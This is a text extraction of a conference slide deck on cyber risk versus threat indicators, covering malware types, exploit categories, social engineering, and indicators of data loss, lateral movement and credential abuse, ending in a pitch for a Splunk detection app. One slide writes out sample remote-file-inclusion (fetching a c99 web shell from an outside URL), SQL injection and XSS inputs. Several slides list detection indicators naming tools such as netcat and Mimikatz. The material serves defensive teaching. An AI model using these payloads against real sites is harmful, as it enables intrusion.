cyber&riskand&threat&indicators& - splunkconf · 2017. 10. 13. · • social...

28
Cyber Risk and Threat Indicators Shane Shook, PhD Chief Knowledge Officer and Global Vice President of ConsulBng Cylance #splunkconf 1

Upload: others

Post on 18-Aug-2020

0 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Cyber  Risk  and  Threat  Indicators  Shane  Shook,  PhD  

Chief  Knowledge  Officer  and  Global  Vice  President  of  ConsulBng  Cylance  

   

#splunkconf  

1  

Page 2: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Risk  Does  Not  Equal  Threat  |  Cyber  Risks  and  Threat  Indicators  

2  

Page 3: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

3  

Page 4: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Malware  –  Windows  /  Linux  /  OSX    (31%  didn’t  use  malware)   •  Dropper/downloaders – Phishing & Waterholing Malware

in Userspace Zero/Single-day Exploits that lead to…

•  Backdoor Trojan RATs – Kernel interactive Service Binaries that mimic legitimate capabilities (RAS/Proxy/AV/Recon/Config)

•  BOTNETs – Platforms for MAAS/Subscription Access

•  WebShells – Internet-facing Server Backdoor RATs (c99/r57/eval)

4  

Page 5: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Hacking  –  .day  Exploits  

•  Zero day •  Vulnerability that only the developer knows about

•  ½ day •  Vulnerability that is known about but no patches are yet available

•  Single day •  Vulnerability that is known about and patches are available but not

applied

•  Forever day •  Vulnerability that is known and cannot be patched

5  

Page 6: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Hacking  –  Web  Server/Services  Exploits  

•  Remote code execution (watch your .htaccess files!) •  register_globals on in PHP | require ($page . ".php"); !http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt

•  SQL injection (watch your user privileges!) •  AND / OR in SQL $query | $query = "SELECT * FROM users

WHERE username = '' or '1=1'";!http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version),,

•  Cross Site Scripting/XSS (watch your syntax!) •  Volatile entry in Echo | <?php echo "<p>Your Name <br />";

echo ($_GET[name_1]); ?> !http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script>

•  Username enumeration (watch your error messages!) •  Username guessing | Incorrect logon / password combination

6  

Page 7: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Social  Engineering  –  Access,  Behavior,  and  Authority  

Subversion   •  Contractors •  Employees

Sabotage   •  Phishing •  Waterholing •  USB “HoneyDrops” & other free

hardware •  “HelpDesk Operators” •  “Visitors” (repairmen, janitors, pizza/

flower delivery, tailgaters)

7  

Page 8: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Advanced  Persistent  Threat  –  Ac#vi#es  

Stage  2  -­‐  Exploit   •  Privilege escalation •  Lateral movement •  User profile abuse •  Remote access

provisioning •  Services bypass/

cancellation

Stage  1  -­‐  Compromise   •  Social engineering

backdoors •  Phishing / waterholing •  Help Desk / visitors

•  Web site backdoors •  Reconnaissance

Stage  3  -­‐  Control   •  Configuration

management •  Data targeting •  Data exfiltration •  Sabotage •  Subversion

8  

Page 9: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Most  Commonly  Seen  Indicators  of  Data  Loss:    •  Non-standard packagers (7z, Gz, RAR, PKZIP, etc.)

•  Multipart files of particular sizes (250/500Mb)

•  “Recyle”/RecycleBin residue

•  HTTP 206 status codes on web servers

•  Non-standard file transfer services (Filezilla, FTP, WsFTP, etc.)

•  Non-standard reverse/proxy services (HUCs, PLINK, NC, SSH, etc.)

9  

Page 10: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Most  Commonly  Seen  Indicators  of  Sabotage:    •  Unusual Prefetch / Recent / LNK / Bash binary execution history

•  AT / CRON jobs

•  Scripts

•  Services cancellation

•  User profile authority changes

10  

Page 11: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Most  Commonly  Seen  Indicators  of  User  Profile  Abuse:    •  Multiple user accounts on single computer

•  User account on multiple computers

•  Service & administrative account propagation

•  Extranet LDAP/AD account use

•  Account privilege provisioning/modifications (SuSID, MD5, Admins etc.)

•  Local  services  history  (MIMIKATZ,  PWDUMP,  L0pht,  CAIN/ABEL)  

11  

Page 12: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Most  Commonly  Seen  Indicators  of  Lateral  Movement:    •  Access history (Type 3 / 4 / 8 / 10 logins, AuthLog)

•  MSTSC history (.RDP, .BMC)

•  Remote job scheduling (AT, SC, WMIC, SSH)

•  Redundant & non-standard RAS tools (VNC, LogMeIn, TeamView, NC, PUTTY, PSEXEC, *FTP, SCP)

•  Domain services history (DSGET, DSQUERY, HYENA)

•  Reconnaissance tools (FPORT, NET/NET1, NETSH, PING)

12  

Page 13: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Most  Commonly  Seen  Indicators  of  Insider  Threats:    •  Unusual profile access and use history

•  Time •  HostID •  Application history •  Configuration history

•  RBAC violations

•  Other acceptable use policy violations

•  Malware / PUP / PUM…

13  

Page 14: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Most  Common  Malware  Iden#fiers:    •  Authority – service, administrator, or user

•  Persistence – only 4 persistence mechanisms in Windows

•  Communications – only 44 netsvcs keys in Windows Services

•  Functionality – user and kernel combinations are rare

•  File System – user or system

14  

Page 15: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Scope of the Investigation

Coverage of the IT Environment

File and Operating System Audit

Network Logs Audit

Host Memory Analysis

Host Disk Forensics

Network Forensics

Phase 1 (Diagnose)

Phase 2 (Assess)

Phase 3 (Collect)

CollecQon  

Windows.bat  

Linux.sh  

OSX.sh  

Processing  

Presponse.py  • ExtracQon  • Parsing  • NormalizaQon  • Transform  • Load  

Analysis  

SQL  

Excel  PowerPivot  

ReporQng  

Compromise  Assessment  

Exhibits  

Cylance  Presponse™  Method  

15  

Page 16: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Cylance  Infinity  –  Machine  Learning  for  Advanced  DetecBon  

16  

Page 17: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Cylance  Infinity  API  –  Submit  Files  or  Lookup  Hashes  

17  

Page 18: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Presponse  on  Splunk  Splunk Universal Forwarder •  Scripted input collection of Presponse Phase 1

data

•  Leverage the existing Splunk deployment

•  Managed via the Splunk Development Server

Presponse App •  Saved searches ü  Data loss or sabotage ü  User profile propagation ü  Lateral movement ü  Malware and IOCs ü  Build and application

inconsistencies

•  Dashboards, form searches and other views

•  Field extractions

•  Lookups (e.g. Infinity)

SourceTypes •  Processes ü  Executable path ü  Modules ü  Handles ü  Connections

•  Services

•  Autoruns

•  Tasks

•  Prefetch

•  Filesystem

•  User profiles

18  

Page 19: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Infinity  External  Lookup  Add-­‐on  •  Reusable Splunk component that packages an external lookup script based on py2INFINITY •  Lookup SHA-256 (and soon MD5) hashes in sourcetypes •  Extend with file upload/response capability

19  

Page 20: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

1.  What files are known bad? 2.  What files are unknown? 3.  Where are the files located in FS? 4.  How many computers are they on? 5.  When were they created? 6.  Who used them?

•  Malware is only an indicator, not a threat

•  It is a risk that should be evaluated by related user history

•  A threat is determined by the impact it had or may have on the business

20  

Page 21: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

21  

Page 22: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

22  

Page 23: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

23  

Page 24: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

24  

Page 25: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

25  

Page 26: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Risk Threat Unpatched software Vulnerable to exploits “.”day exploit Used in place of malware Malware Used to reconnoiter or sabotage systems Uncontrolled access Persistent access to non-public information Undocumented systems Lack of awareness Tools vs. experience Lack of perspective Outsourcing Lack of control

When  is  a  Risk  a  Threat?  

26  

Page 27: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

[email protected]  |  Cyber  Risks  and  Threat  Indicators  

27  

Page 28: Cyber&Riskand&Threat&Indicators& - SplunkConf · 2017. 10. 13. · • Social engineering backdoors • Phishing / waterholing • Help Desk / visitors • Web site backdoors •

Next Steps

28  

1  

2  

3  

Download  the  .conf2013  Mobile  App  If  not  iPhone,  iPad  or  Android,  use  the  Web  App  

 Take  the  survey  &  WIN  A  PASS  FOR  .CONF2014…  Or  one  of  these  bags!  

 Check  out  the  other  “Using  Splunk”  presentaBons  All  PPTs  are  in  the  Mobile  App  Videos  will  be  uploaded  shortly